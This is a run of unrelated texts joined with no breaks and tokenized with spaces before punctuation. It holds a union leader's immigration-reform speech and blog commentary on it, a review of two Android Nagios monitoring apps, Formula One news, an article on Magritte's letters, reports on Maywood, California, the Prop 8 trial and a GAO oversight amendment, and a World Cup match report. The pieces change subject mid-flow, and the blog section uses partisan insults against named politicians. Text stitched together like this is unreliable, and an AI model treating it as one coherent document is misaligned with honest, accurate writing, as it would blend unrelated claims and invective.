There is no better way to understand that than to look at what has happened between the United States and Mexico since NAFTA was implemented in 1994 .
NAFTA was sold to the American public on the idea that increasing trade with Mexico would create good jobs in both countries and slow the flow of undocumented workers coming to the U.S. from Mexico .
Instead , inequality has grown and workers ' rights have eroded in both the U.S. and Mexico since NAFTA 's passage .
And illegal immigration flows have tripled .
Today we treat our relationship with Mexico as if it were a national security problem -- solvable with military aid and a militarized border .
And that is a dangerous mistake .
The failures of our relationship with Mexico represent a failed economic strategy .
They can not be solved with guns and soldiers and fences .
They must be addressed through an economic strategy for shared prosperity based on rising wages in both countries .
Instead , at the heart of the failure of our immigration policy is an unpleasant fact , one that you almost never hear talked about openly :
Too many U.S. employers actually like the current state of the immigration system -- a system where immigrants are both plentiful and undocumented -- afraid and available .
Too many employers like a system where our borders are closed and open at the same time -- closed enough to turn immigrants into second - class citizens , open enough to ensure an endless supply of socially and legally powerless cheap labor .
Our immigration system makes a mockery of the American dream .
The people doing the hardest work for the least money have no legal protections , no ability to send their children to college , no real right to form a union , no economic or legal security -- no way to turn their contributions -- their years of hard work -- into the most fundamental right of all , the right to vote .
That is intolerable for a democracy .
Recently , I met a young woman named Fabiola , who came to the United States when she was two years old .
Her parents have worked in the United States for twenty - two years .
Fifteen years ago , her father became a U.S. citizen , so all her younger siblings who were born here also are citizens .
But Fabiola fell through the legal cracks and is now too old to become a citizen under current immigration law .
But that has not stopped her from working hard to live the American Dream .
Recently , she graduated from the University of California with a degree in international development .
But she cannot find a job in her field because she is undocumented .
How does Fabiola 's story make any sense in economic or human terms ?
Her talents and her education are being squandered because our immigration system is simply not working .
That is why the AFL - CIO is fighting to fix this broken immigration system as a crucial element of our broader economic strategy .
Because we stand for the American Dream for all who work in our country .
Because we are for ending our two - tiered workforce and our two - tiered society .
And because an underclass of disenfranchised workers ends up hurting all workers .
But we are not for any kind of immigration reform .
We will not support the return to outdated guest worker programs that give immigrants no security , no future here in the United States , no rights and no hope of being part of the American Dream .
Immigration reform must begin with the principle that workers in the United States deserve to enjoy a fair share of the wealth we create -- that wages should move up with productivity .
The labor movement and a broad coalition of faith - based and immigrants ' rights groups have worked with former Secretary of Labor Ray Marshall to put together such a program for comprehensive immigration reform .
The AFL - CIO is for a fair path toward legalization for all undocumented workers who are working to realize the American Dream .
We are for the DREAM Act , that gives young people like Fabiola a future in the only country they know .
We need an independent commission to determine our society 's genuine need for more immigrants , and then we need to build a pathway that allows immigrants to be securely part of our country from day one -- able to assert their legal rights , including the right to organize , without fear of retaliation .
And together with this commission , going forward we are for establishing real penalties for employers who break the law .
We must focus enforcement not on those who come here seeking the American Dream , but on those who would exploit them .
This is the reform the labor movement is fighting for .
But instead , we see today a dangerous drift toward a politics of hate .
Last month , I went to Arizona to stand with working people who were the target of a hate campaign -- a campaign for racial profiling waged by the state legislature and signed into law by the governor .
A campaign to make anyone who might look like an immigrant live in fear of the police .
All of us should fear such a system :
In the end , do n't all of us who are n't Native Americans look like the immigrants and children of immigrants that we are ?
As President of the AFL - CIO , my message to working people is that we all are bound together by our lives as workers , our dreams for our families , and our hopes for this country 's future .
The labor movement stands for giving all workers in America the right to dream the American Dream .
Unfortunately , the American Dream is slipping away .
Today , as in any economic crisis , there are people who offer hatred and divisiveness as the solution to the crisis .
If our political leaders do not lead , if they do not offer help in the present and a clear strategy for prosperity in the future -- starting with good jobs -- those voices of hate will grow , they will become more powerful , and they will feed on the public 's anger and pain and desperation .
President Obama has laid out in broad terms the approach we need to take .
He has spoken out for creating good jobs , rebuilding manufacturing , taking on the challenge of climate change and energy independence , growing exports and investing in our infrastructure , including our education infrastructure .
If we are truly going to build a world class workforce , we need to restore workers ' fundamental human right to organize and bargain with their employers .
And we need to make sure every worker in America -- documented or undocumented -- is protected by our labor laws .
That is why it is so urgent that we reform our immigration system .
The President 's strategy also requires that we invest in rebuilding our country .
Consider this fact -- as a result of the economic recovery act , we are now in the process of planning approximately 500 miles of high - speed rail , including lines here in Ohio .
Sounds good , until you realize that China , a country about the same size as the United States , is in the process of constructing 5,000 miles of high - speed rail .
Restoring workers ' rights and building workers ' skills .
Creating the infrastructure of the 21st century .
Thinking strategically when it comes to trade policy .
These are the strategies for making the American Dream as real for our children as it was for my parents .
But that will not be enough .
We as a nation must be true to our better selves -- employers must not make a buck on the backs of workers who live in fear of deportation , and workers must stand together in the workplace for good jobs , safe jobs , health care for all , and retirement security we can count on .
And so when we talk about making the American Dream real , the labor movement stands for making it real for all of us who do the work of our country .
All of us -- no matter what we look like , who we choose to love , or where we come from .
Surely there we can find common ground .
Earlier this week , Sen. Jon Kyl ( R - Ariz . ) caused a stir when he was quoted saying that President Obama personally told him the administration will not support stricter border enforcement until Republicans back broad immigration reform .
The White House denied the claim .
Now Kyl is saying that 's not what he meant .
Kyl was quoted : " The president said the problem is if we secure the border , then you all wo n't have any reason to support comprehensive immigration reform .
In other words , they 're holding it hostage . "
In an interview with National Review , Kyl explained :
Kyl tells us that the comments were " taken a bit out of context , " and that the " they " he was referring to was the Left , " the president 's base , " and not the administration .
" I did not try to start a fight .
This meeting happened a month ago and we were talking in the context of his political problems .
He was talking about how they think that if we secure the border , you guys [ Republicans ] wo n't have the incentive to work on comprehensive immigration reform . "
At the time , a spokesman for Kyl forcefully defended the story .
" There were two people in that meeting , and [ White House spokesperson ]
Dan Pfieffer was not one of them , " Patmintra said .
" Senator Kyl stands by his remarks , and the White House spokesman 's pushback that you must have comprehensive immigration reform to secure the border only confirms Senator Kyl 's account . "
I guess no one discriminated against the British who came to America -- other than maybe the rich parasites lording it over everyone else ... as they were -- and still are -- wont to do .
But everyone else who came to these shores had a time when they were treated like garbage .
Africans , who were dragged here against their wills and in chains , are in a separate category , but certainly the Irish , the Germans , the Slavs , the Italians , the Jews , the Chinese , the Japanese all wound up here in America and made to feel unwelcome by conservative shit heads for at least a few decades before they melted in .
The Know Nothings -- direct political antecedents of today 's nativist teabaggers ( i.e. , the grassroots of the Republican Party ) -- were a force to be reckoned with in the 1840s and ' 50s and the hated villains in their narrow world : German immigrants and Catholics , especially German Catholics , although in many areas their hatred of Irish Catholics was even greater .
Their bogeyman man was Pope Pius IX .
Their main platform : stopping immigration and curbing naturalization .
Although they eventually proudly ran candidates on the Know Nothing line , they started out , in 1843 , as the American Republican Party and later the Native American Party -- although Indians were as unwelcome as Catholics or Jews .
Historian James McPherson , wrote in his Pulitzer Prize - winning book , Battle Cry of Freedom that " [ i] mmigration during the first five years of the 1850s reached a level five times greater than a decade earlier .
Most of the new arrivals were poor Catholic peasants or laborers from Ireland and Germany who crowded into the tenements of large cities .
Crime and welfare costs soared .
Cincinnati's crime rate , for example , tripled between 1846 and 1853 and its murder rate increased sevenfold .
Boston 's expenditures for poor relief rose threefold during the same period .
Know Nothing candidates , running on a virulently anti-immigrant platform , won elections all over Massachusetts , won the governorship of California ( J. Neely Johnson ) and mayors races in Boston , Philadelphia , Louisville , Chicago ( where all immigrants were then barred from city jobs ) , and San Francisco ( where there was widespread hated of immigrants from China and Chile ) .
Two prominent Know Nothings , Schuyler Colfax ( IN ) and Henry Wilson ( MA ) went on to be elected Vice Presidents a s Republicans .
As you might guess , the Know Nothings , like today 's teabaggers , idolized violence and , in fact a Know Nothing riot in Louisville killed 22 people in 1855 and accomplished exactly what the Know Nothings wanted -- driving 10,000 mostly German immigrant families to pack up and move to St. Louis , Chicago and Milwaukee .
A few years ago right wing icon William Kristol wrote an editorial in thewarning Republican activists of the dangers the party would face by " turning the GOP into an anti-immigration , Know - Nothing party . "
Apparently no one was listening .
My pal Roland is a teacher in Compton .
Most of his students were either born in Mexico or have at least one parent who was .
He 's been telling me for years that these people are the most respectful of education -- and educators -- of anyone .
The parents are very much into making sure their children are well educated and the children come to school everyday prepared to become all - American .
This week he 's visiting his family in Lewiston , Maine .
He keeps calling and telling me how well - assimilated the Somali immigrants there are compared to just 4 or 5 years ago .
No doubt the sociopath and teabagger the GOP has nominated for governor , Lewiston resident Paul LePage , will do his best to stir up racial , religious and cultural animosities .
Despite his first hand experience and his personal predisposition in favor of immigrants , over the years Roland has sometimes fallen prey to right wing propaganda painting immigrants as ... well you know ; I 'm not going to repeat the nonsense .
He blames Democrats and never seems to understand that goaded by unions wanting to keep the price of labor high , Democrats have traditionally been somewhat cool towards immigration .
Republicans , I always tell him , want cheap labor for their financial supporters ' factories , farms and service industries .
Republicans would prefer slaves or some arrangement as close to slavery than can arrive at .
Democrats insist on a humane approach to immigration .
Friday AFL - CIO
President Richard Trumka articulated labor 's evolving attitude towards immigrants at an event in Cleveland .
It 's a remarkable speech for a labor leader and well worth reading .
Here 's a major excerpt : Watch a current Know Nothing , Jon Kyl of Arizona , stirring up racial hatred in Arizona Friday .
He senses he can use the issue to push his party 's partisan agenda .
If you watched the video above , there were only two possible conclusions : Obama is insane for taking a viciously partisan scumbag like Kyl into his confidence or Kyl , a viciously partisan scumbag , was lying .
It 's one week later and we find out the definitive answer : Kyl , as he is wont to do , was lying his ass off
There were also recording devices .
Labels : immigration , Know Nothing Party , Richard Trumka
Nagios is by far one of the best solutions for monitoring just about everything on a server , and it ’s excellent API system means that anything it does n’t include out of the box can be written in just about any programming language as long as the program output conforms to their standard .
I ’ve personally written dozens of modules for micro-managing network interfaces , disk IO and so on .
I ’ve even heard of elaborate schemes of detecting when system load is too high on web servers and launching more Amazon EC2 instances , or checking when load is low enough to terminate EC2 instances , all fully automated .
That said , next to Decaf , Nagios monitoring tools were a strong requirement for my Android arsenal .
Waiting for Emails or SMS messages to arrive is one thing , but being able to actively manage system alerts from Nagios is entirely different .
In today ’s segment , I ’ll be looking at two different systems , Nagroid and NagMonDroid .
Searching for “ nagios ” in the Market on a Nexus One with Froyo installed only came up with these two applications .
Under Eclair ( 2.1 ) , I recall seeing several other apps , some of them were commercial apps for purchase .
To begin , I will introduce and describe the two apps , and then cause one of my employer ’s systems to fall into an alert stage so we can see what happens in a real - world scenario .
Again , thanks to my employer for being trusting about this sort of thing .
Nagroid
Introduction
At the time of this writing , Nagroid , by Simon Schoar , had 4.5 stars , and describes itself as such :
Nagroid is an unofficial nagios client for android devices .
This utility will help system administrators who are using nagios to monitor their servers and services .
The latest version is 0.0.7 and weighs in at 151Kb .
It ’s in the 1000 - 5000 download range , and its 4.5 stars are from 140 ratings , including comments such as ‘ Anthony ’ saying Nagroid is “ much better than having nagios SMS me ! ” , and helpful feedback such as ‘ rince ’ saying “ Would love the ability to mark a problem as seen so that I stop being bugged once I ’ve acknowledged the issue / ” .
The developer web page , something I have n’t done on previous articles but will do so in all upcoming segments , is http://code.google.com/nagroid/
and its security requirements only ask for Internet access , and prevent the phone from sleeping ; secondary security controls ask that it can view the network state of the phone , control the hardware vibration module , and automatically start at boot time .
Upon starting , some fake Nagios systems are entered into your device ’s memory so that you can see how the system details will be displayed ( image 1 ) .
As you can see , the output is quite simplistic .
The software also adds an icon to the notification bar on my device .
Pulling down the notification area shows us a simple alert ( image 2 ) .
Tapping on any of the alerts will briefly highlight the alert but does n’t do anything ; likewise , a long tap does nothing either .
Tapping on your Submenu button will show you some controls ( image 3 ) , such as refreshing the list , seeing information about the Nagroid app from an ‘ about ’ dialog , viewing a log of events , a More button which will allow you to view Help pages at the author ’s web site , or Enable / Disable the service when starting up your Android device , linking to the configuration screens , or being taken to “ My Nagios ” which is a URL you enter in the configuration screens for your primary Nagios monitoring server ( images 4 , 5 and 6 ) .
The submenu in the configuration screen is similar to that on the opening screen of the app , but slightly rearranged ( image 7 ) .
Configuration
There are 4 configuration sections : Nagios , Polling , Notification , and Misc .
The Nagios section shows 5 settings here , such as the URL for your main Nagios monitoring server .
This is the URL will you redirect to any time you select “ My Nagios ” from any submenu while in the app .
The second option is for self - signed SSL certificates , so security warnings can be bypassed ( it warns you that man - in - the - middle attacks are possible if enabled ) .
Third is a setting for basic HTTP Authentication , in case you have it enabled on your main Nagios monitoring server , at which point options 4 and 5 ( username and password , respectively ) are enabled .
Once I entered my URL and other credentials , doing a refresh on the main screen shows me nothing at all ( image 8 ) , proving the old cliché of “ no news is good news . ”
It ’s also interesting to note that the Notification bar icon has changed – when critical events were seen from the test data , the android icon had red arms ; when everything is okay , the icon has green arms .
Very clever , and details like this really show the app developer has some ingenuity behind his design process .
The Polling section of the configuration only has one option , which is how often you want your Android device to check your Nagios server for event data , with times of “ off ” , 1 to 5 minutes , 10 , 15 , 30 , 45 and 60 minute intervals , with 10 minutes being the default .
I set mine to one minute for some testing which we ’ll get to later .
The Notification section has some interesting options worth talking about .
The first checkbox tells Nagroid to only show you events that have not already been marked as ‘ handled ’ within Nagios itself .
Be default , this is already checked for you , however if you have subordinates who do primary service monitoring , you may want to turn this off so you can keep an eye on everything about your system , not just events that have n’t been handled by other staff members .
The second checkbox will enable the hardware vibration module within your device , and is on by default .
The third option , off by default , will hide the icon on the notification bar if everything is okay ; I enable this to keep with the “ no news is good news ” saying , although having the icon present can assure you the service is actually running .
The fourth checkbox will enable audible alarms , and the rest of the options in the Notification section allow you to set appropriate sounds / music .
Finally , the Miscellaneous section has two checkboxes which are both checked by default : one for auto - starting the monitoring service when your Android device restarts , and one to actively check for updates to the software .
The latter of the two can be de-selected if you use Android 2.2 ( Froyo ) and flag the app to auto - update when a new version is available .
Real World Setup and Usage
After entering my URL and login credentials , I refreshed the home screen , and selected “ Log ” from the submenu , which shows a simple list of information .
Since I have n’t begun any Nagios events yet , everything in image 9 looks pretty normal : one minute intervals of showing everything is Ok .
There is a “ Clear ” button at the top to clear any log entries .
Selecting “ My Nagios ” from any submenu opens the Android browser and redirects me to a sample Nagios monitoring server I configured for this review , and shows me that my one host is online , and 11 services on the server are operational .
We ’ll Be Back in a Moment
I ’ll introduce NagMonDroid first , and then step into some of my testing to show real usage of these two apps .
NagMonDroid
Introduction
NagMonDroid was developed by Simon McLaughlin , and currently is rated 2.5 stars by 28 ratings .
It too has had 1000 - 5000 downloads , and describes itself in the Market like this :
Now open source !
NagMonDroid ( formally NagiosMonitor ) retrieves the current problems from your Nagios install and displays them .
It has a variable update frequency and can be set to vibrate on new update .
The latest version is 1.5.3 and weighs in at 146Kb .
The developer web page is http://code.google.com/p/nagmondroid/ and most comments are from pre-2010 .
The only three comments from 2010 include ‘ lowecg2004 ’ in January saying “ not bad but really needs to alert on status change rather than on update .
Would also like to see a different icon and sounds for ok / warn / critical . ”
The other two comments from March 2010 from ‘ Matt ’ and ‘ Piotr ’ say the app does not work , or is slow , or that it does n’t work with SSL - enabled Nagios servers .
Several comments ask the developer to make the software open source , which he appears to have done .
The security settings on the app installation ask for Internet access , and to control the hardware vibration in the device .
Upon starting , an alert box is immediately shown , telling me to set the URL of my Nagios monitoring server in the Settings menu ( image 11 ) .
No offense to the developer , but that ’s sort of a given , is n’t it ?
Once that alert is cleared , we can see a blank screen showing that background checking is disabled by default ( image 12 ) , which makes sense when the author has n’t pre-configured any test data .
The submenu on this home screen ( image 13 ) shows icons for Settings , an About button ( which simply shows a dialog box showing the author ’s name , the author ’s personal web site ( not the application ’s web site as listed in the Market ) , and the current version number ) , and buttons to start and stop what I can only guess is the background service to check my Nagios server for information .
Settings
The settings menu is shown in images 14 and 15 , though the second image only shows one missing setting from the first page .
The settings menu is split into two sections called Settings and Preferences .
The Settings section has an area to enter the URL of your Nagios monitoring server , a username and password to log into Nagios ( if your server is configured as such ) , and an update interval with settings of 10 , 30 , 60 and 90 seconds , 3 , 5 , 10 , 30 , 60 , 120 minutes , and 3 , 6 , 12 , and 24 hours .
Frankly , any sysadmin who would use an app to monitor Nagios instead of getting Email / SMS alerts would be foolish to set anything higher than 60 minutes , unless their systems are so low - volume as to not matter .
However , the fact that the author gives sub - minute checking could be extremely vital to sysadmins who need near real - time information from their systems , though the resources and network latency of a 10 - second monitoring cycle could be expensive in battery life and bandwidth .
It ’s also important to note that since the author does n’t include options for basic HTTP authentication ,
The Preferences section includes three checkboxes .
The first is to display status messages for services which are not in Warning or Critical modes , and is off by default .
The second checkbox , enabled by default , allows you to hide any services that are configured within Nagios to disable notifications .
The third option , off by default , would enable the hardware vibration module .
Since the author did n’t see fit to include options for audible alerts , this last option should be enabled unless you stare at your Android device 24x7 .
Real World Setup and Usage
I entered my Nagios URL , and typed in my basic HTTP authentication details in the Nagios username / password fields , enabled all three of the checkboxes from the Preferences area of the settings , then used the Back button to return to the home screen , pressed the Submenu button , and selected Start .
It claims to be connected to my system , at which point I see a new home screen ( image 16 ) .
However , since the one checkbox under Settings -> Preferences is supposed to display all services , even those with notifications turned off within Nagios , the fact that I see a blank screen causes me to believe the app does not work as intended .
I stopped the monitoring service , went back to the Settings menu , erased the Nagios username / password credentials , and changed my URL to use the horribly insecure http://username:[ email protected ]/ style of authentication , and restarted the monitoring service , and saw no change .
Conclusion
At this point , I cannot recommend NagMonDroid for any further testing .
Granted , the author has made his software open - source , so perhaps someone could pick it up and improve the application .
My advice for Nagroid would be to check this author ’s code for the setup involved with enabling notifications for services set within Nagios with no notifications , as this is a handy means to see that everything is working as it should .
Also , sub -minute alert checking would be quite handy as well , though cautioning the user about battery drain and bandwidth would be a wise move .
Real - World Testing with Nagroid
On a separate system at work , I installed a basic Nagios setup with native services for watching disk space , system load , as well as services to the outside world such as Web , Email and SSH access , as well as a few custom modules I wrote to monitor network interface traffic and disk I/O .
To show how Nagroid can alert us , I will begin to fill up a local disk partition with dummy data using a simple Linux command :
dd if=/dev/zero of=/tmp/empty.txt count=6M ibs=1K
This will essentially attempt to create a 6GB file of empty data ( 6 million blocks of 1Kb each = 6GB ) .
The disk partition which mounts the / tmp / file system is an 8 GB partition , and currently has about 0.5GB of data on it , so adding 6GB more , totaling 6.5 GB should cross the 80 % “ Warning ” boundary of Nagios .
While this was going on , Nagios actually tripped on a new Critical alert : system load .
Unfortunately , nothing showed up in the Nagroid Log screen about it ( images 17 and 18 ) , and the red line does n’t give me any information at all about why a service has gone critical or when , which seems like a serious problem with the reporting of Nagroid .
Being able to tap on a line of information should give information about why the service is Warning / Critical , and when it was first reported , when it was last checked .
Once our file load testing was complete , we can see it also shows up in our list as a Warning level ( image 19 ) , but again , nothing shows up in the Log screen ( image 20 ) , leading me to believe the Log screen must only show status about Nagroid connecting to our Nagios server .
Deleting the files and leaving the system alone for a few minutes removed all alerts from Nagroid , and everything went green .
Conclusions
Well , it always seems a little awkward when there ’s only one app in the Market to do something you deem vital to your daily routine , especially if that app does n’t do everything you want / need / expect .
In the case of Nagroid , while I love the interface , seems that it ’s not even equivalent to the Email or SMS alerts that can be sent by Nagios , which would include information about WHY a service is in a Warning or Critical state .
This kind of information is vital , especially knowing WHEN something has happened .
This is a major negative on the part of the system ; if it can retrieve status information from Nagios , it should be able to retrieve why .
Aside from this lack of information , the only thing on my wish list for the app would be the ability to submit information back to Nagios , such as acknowledging an alert or turning a service ( or notifications for a service ) on or off .
Still , it does log us into our Nagios panel from the configuration of Nagroid itself , and anything Nagroid ca n’t do can be done well enough within the Android web browser , and this extra step to get to Nagios can provide far more information than an Email or SMS message .
I would whole - heartedly recommend Nagroid as a must - have application for any sysadmin who uses Nagios to keep an eye on their systems .
Now if only someone could make a reasonable / reliable app ( Android or otherwise ) to * configure * Nagios …
As for NagMonDroid , I ’m disappointed that it could n’t even connect to Nagios , let alone give us any basis of comparison against Nagroid .
Since the application is now open sourced , perhaps some of us within the Android community can pick up the project and improve upon it .
Mercedes is still battling to get a mastery of the new technology © Sutton Images Enlarge Related Links Race :
Canadian Grand Prix Drivers :
Nico Rosberg Teams :
Mercedes
A week ahead of the Canadian Grand Prix , Ross Brawn has told autosport that Mercedes ' F - duct system is still not working as well as it should .
Although the team has been experimenting with the new system since the Chinese Grand Prix in April , it has yet to get to grips with it , and Brawn admitted it is still generating too much drag on the straights , leaving the car well off the pace of the McLarens and Red Bulls .
" I think when you get the F - duct working properly you have … downforce in the corners and then turn drag off on the straight , " Brawn said .
" At the moment we are not turning off enough drag on the straight .
" McLaren were clever enough to come up with the concept and have a lot more experience of it .
You are seeing certain teams abandoned in Turkey and when it works properly it is a very , very powerful tool .
We are persevering with it . "
Despite this , both Nico Rosberg and Michael Schumacher are optimistic about Canada .
" Our Mercedes - Benz engine will certainly be a big help on the main straight , " Rosberg said .
" We 'll have some further upgrades for the race weekend and the fact that the circuit characteristics are quite different from Istanbul Park makes me go there with high hopes .
I think we might just put in a great result . "
WHEN René Magritte was 13 years old , his mother drowned herself in a local river .
When the body was recovered her face was found to be covered with her nightdress .
No one knew whether she had deliberately shielded her eyes from death or if the river current had simply veiled her face .
Magritte had begun painting a year earlier .
He would become obsessed with the hidden .
His paintings often include grey rivers , pale lifeless bodies , faces swathed in fabric , solitary men walking , sea water and rampant roses — as well as the floating apples , burning bassoons , fingerless arms , sponges and pipes that began to appear in his work after he met Giorgio de Chirico , an Italian artist , and converted to Surrealism .
For nearly a century fans of Magritte have studied his works , determined to find hidden meanings within them .
But the man himself fiercely resisted interpretation .
He wanted his pictures to be looked at , he said , not looked into .
Yet the temptation to probe persists , which is one reason why Sotheby 's sale next month of a cache of more than 40 letters by Magritte — unseen for nearly a quarter century — is exciting so much interest .
The letters , most of which are undated and not included in the collection that was published in 1994 , span more than 20 years and cover a wide range of topics — artistic , literary and surreal .
They are all addressed to Paul Colinet , a Belgian poet who worked closely with Magritte and who , for a long time , was also the lover of Magritte 's wife .
Magritte had met the pretty Georgette Berger when they were both schoolchildren .
Their marriage was childless , but famed for its constancy .
Her affair with Colinet was her only transgression and seems to have been encouraged by Magritte while he was away in London in 1936 , developing a relationship with Edward James , ultimately one of his most important patrons , and possibly having a brief dalliance of his own .
“ I want you to do wherever possible whatever you can to make my absence less distressing to my wife , ” he wrote Colinet .
Magritte could not keep up this phlegmatic act , however .
On his return , he persuaded a policeman to accompany him as he followed the couple to the inevitable confrontation .
For a while the two men fell out badly .
The artist and the poet had met three years earlier and quickly became close friends .
Colinet 's first published work , a poem set to music , bore a suitably Magrittean title , “ Marie Trombone Chapeau buse ” , and contained an illustration by the Surrealist painter .
Yet these letters reveal that it was Magritte who came to depend on Colinet , rather than the other way round .
Magritte 's letters to Colinet were recovered from his studio by Georgette after his death and sold at auction in London in 1987 .
They were bought by an American businessman , who thought that at £ 12,000 ( $ 20,076 at the time ) they were a steal .
He has kept them in a safe ever since .
They are now being offered with an estimate of $ 200,000 - 400,000
In writing , Magritte is unremittingly cheery .
Unlike most artists he never spills into bilious complaints about lack of money , scheming gallerists and the dimness of the art - viewing press .
He discusses at length a picture of a hen and boiled eggs , which was finally painted in a different form as “ Variantes de la Tristesse ” , asking whether Colinet thinks the egg should be intact or “ decapitated ” .
He frequently seeks Colinet 's advice on naming his pictures , and praises the poet 's talent for picking titles .
He includes a sketch and asks for several alternatives with the words “ un titre plaese !
( prononcer un ‘ titre plisse ' ) ” .
On a small landscape , Colinet writes in green ink : “ Les Bonnes Nouvelles ” , “ La Presence d'Esprit ” , “ La Science du Mouvement ” and “ L' Art Magique ” .
The letters are full of sketches that show Magritte 's vivid imagination .
He plays with numbers ( digressing on the significance of the number nine ) , offers fierce opinions ( on Martin Heidegger and Jorge Luis Borges , among others ) and decorates the text with a wide array of sketches .
The most amusing is a drawing of a giant boater , so big it 's almost a marquee , with lots of people stashed away underneath it , and a note of personal instruction from Magritte : “ Pensé aussi à un chapeau pour plusieurs personnes . ”
Réné Magritte 's correspondence with Paul Colinet will be sold at Sotheby 's in New York on June 18th as part of its Fine Books and Manuscripts sale .
Economic hard times are causing many municipalities to look for ways to reduce their payrolls , but none has taken it as far as the town of Maywood , California .
On Monday night , the Maywood City Council voted unanimously to fire all 100 city employees and contract out most services , including record - keeping , street maintenance , and parks and recreation , to the neighboring town of Bell .
ADVERTISEMENT
“ We will become 100 % a contracted city , ” Maywood ’s interim city manager stated .
Even the Maywood police department will be disbanded .
Those services will be provided by the Los Angeles County Sheriff ’s Department , since a proposal earlier this month to merge Mayfield ’s police department with that of Bell was met with angry protests by Bell residents .
It was the police department that largely got Maywood into its current financial troubles .
Last month , the town was informed by the California Joint Powers Insurance Authority that it would no longer be able to obtain liability insurance , largely as a result of excessive claims filed against the police .
According to the Los Angeles Times , “ The [ Insurance Authority ’s ] action is yet another blow for the predominantly Latino city of 45,000 residents densely packed into about 1.2 square miles in the heavily industrial southeast part of Los Angeles County .
Officials estimate about half the city ’s residents are illegal immigrants . ”
“ Four years ago , the department faced a political outcry when it began running checkpoints that resulted in hundreds of cars being taken away from unlicensed illegal immigrants , ” the Times explains .
“ The checkpoint sparked a political movement that brought a new council that was more sympathetic to illegal immigrants .
But Maywood was back in the headlines when it declared itself a sanctuary city for illegal immigrants , making the town a target of conservative talk radio and TV news shows . ”
ADVERTISEMENT
Last year , California Attorney General Jerry Brown announced that he would seek a court order to impose reforms on the Maywood Police Department , after a sixteen - month investigation had revealed “ gross misconduct and widespread abuse . ”
There have already been two police shootings since the start of 2010 that drew investigations by the Los Angeles County Sheriff ’s Department .
The Los Angeles Times reports that town residents blame the current problems on “ years of financial abuse and corruption ” by the city council .
Ironically , however , the city manager , attorney , and council members are the only Maywood employees who will remain on the payroll .
“ You guys had the power to change it and you did n’t , ” City Treasurer Lizeth Sandoval told the council at Monday ’s meeting .
“ You single - handedly destroyed the city . ”
After a nearly three - week trial in January , and a lengthy hiatus while lawyers fought over documents , closing arguments are scheduled for Wednesday in a lawsuit challenging the constitutionality of Proposition 8 , California ’s ban on same - sex marriage .
No one expects the ruling from Judge Vaughn Walker in Federal District Court to be the last word .
The United States Court of Appeals for the Ninth Circuit , in San Francisco , will have its say , and so , eventually , may the Supreme Court .
The testimony made abundantly clear that excluding same - sex couples from marriage exacts a grievous toll on gay people and their families .
Domestic partnerships are a woefully inadequate substitute .
On the witness stand , the plaintiffs described the pain and stigma of having their relationships relegated by the state to a lesser category that fails to convey the love and commitment inherent in marriage .
“ My state is supposed to protect me .
It ’s not supposed to discriminate against me , ” said Paul Katami , one of the plaintiffs .
Updated below , to reflect passage of the amendment
Defying a previous veto threat from the White House , the House of Representatives will consider an amendment to bolster intelligence oversight by requiring intelligence agencies to cooperate with the Government Accountability Office when it performs audits that are requested by a congressional committee with jurisdiction over intelligence .
In general , the amendment ( pdf ) states , “ the Director of National Intelligence shall ensure that personnel of the Government Accountability Office designated by the Comptroller General are provided with access to all information in the possession of an element of the intelligence community that the Comptroller General determines is necessary for such personnel to conduct an analysis , evaluation , or investigation of a program or activity of an element of the intelligence community that is requested by one of the congressional intelligence committees . ”
The amendment to the FY2011 Defense Authorization Act ( HR 5136 ) was sponsored by Rep. Anna Eshoo ( D - CA ) and several colleagues .
When a similar amendment was included in the FY2010 Intelligence Authorization Act , which is still pending , it prompted a veto threat from the Obama White House .
But the White House opposition was based on an erroneous interpretation of the law , the Acting Comptroller of the GAO told Congress .
Somewhat surprisingly , given the likelihood of a renewed veto threat , the House Democratic leadership ruled that the Eshoo amendment was “ in order , ” and it will therefore be considered on the House floor , perhaps today or tomorrow .
Back when he was a Congressman in 1987 , CIA Director Leon Panetta introduced a bill called the “ CIA Accountability Act ” ( pdf ) that would have reinforced GAO oversight over the Central Intelligence Agency .
Update :
The amendment passed the House on May 27 by a vote of 218-210 .
See this news release from Rep. Eshoo : House Passes Legislation to Increase Oversight of Intelligence Community .
England manager Fabio Capello was left dumbfounded by his team 's tepid goalless Group C draw with Algeria .
England were restricted to long - range efforts as they failed to break down a stubborn Algeria team to record their second draw of the tournament .
" We lost too many passes , it was not the same team that I know , the team I see when they train , " said Capello .
" When you do n't play well it 's not just one player [ who plays badly ] .
The team did n't play in the spirit that I like . "
England 's second successive draw means they must win their final match against group leaders Slovenia on 23 June to ensure they progress to the last 16 .
World Cup Blog What did Rooney expect ?
He should reflect on this and deliver an apology at the earliest opportunity
Phil McNulty in Capetown Capello had hoped the return of defensive midfielder Gareth Barry would give Steven Gerrard and Frank Lampard more opportunities to support strikers Wayne Rooney and Emile Heskey but instead he was subjected to a disjointed and insipid performance on his 64th birthday .
Rooney in particular was off - colour and vented his anger at a TV camera as the sound of boos resonating around the Cape Town Stadium at the end of the match .
Two days before the game , Rooney had expressed confidence that England would beat Algeria and believed England could " not be at [ their ] best and win the game " .
But he cut a disgruntled figure as he trudged off the pitch and said into the camera : " Nice to see your own fans booing you , that 's what loyal support is . "
However , Manchester City's Barry said he sympathised with the frustrations of the travelling England fans .
" It 's a long way to come out here , they want the best for us and so do we , " Barry told BBC Sport .
" They want to see us qualify and extend their stay out here .
We need one more push to do it for the fans . "
And Jermain Defoe , who came on as a second - half substitute , described the booing from England supporters as " part and parcel of playing at this level . "
The Tottenham striker added : " You can understand fans getting frustrated and obviously they have travelled miles to come and support the team .
" But I think it 's important for the fans to stay behind us , because the lads are devastated we did n't win . "
Capello's team bore little resemblance to the one that topped World Cup qualifying Group 6 , producing little invention and spark .
And the Italian suggested the pressure of playing in a World Cup could be partly responsible for the poor display .
" Perhaps , I think so , " stated Capello .
" The players play well during the training .
I do n't know why it is .
I want to see the spirit of the team and I did n't see it this evening .
" I said to the players it was n't a good performance but we are really lucky because we can play another game .
I 'm always confident in my team . "
Goalkeeper David James , brought in for his 50th cap for England ahead of Robert Green , was left frustrated by a resilient defensive performance from Algeria , who are 22 places below England in 30th place in Fifa 's world rankings .
" You have to give Algeria credit for making the game as dire a spectacle as it turned out , " James told BBC Radio 5 live .
" They did n't want us to create chances and apart from a couple of long - range free - kicks that were n't even close , I can't remember an effort that went near to the target .
" That seems to be a common theme at this World Cup - teams not wanting to lose rather than going all out to win .
It has been proved with Germany , Spain and , to a lesser extent , France all losing . "
James confirmed that he was informed he would play instead of Green only a couple of hours before kick - off .
He said : " I found out five minutes before we got on the bus .
Usual standard .
The selection process is the same regardless of what match it is .
That 's the way the manager wants to do it , and we accept that .
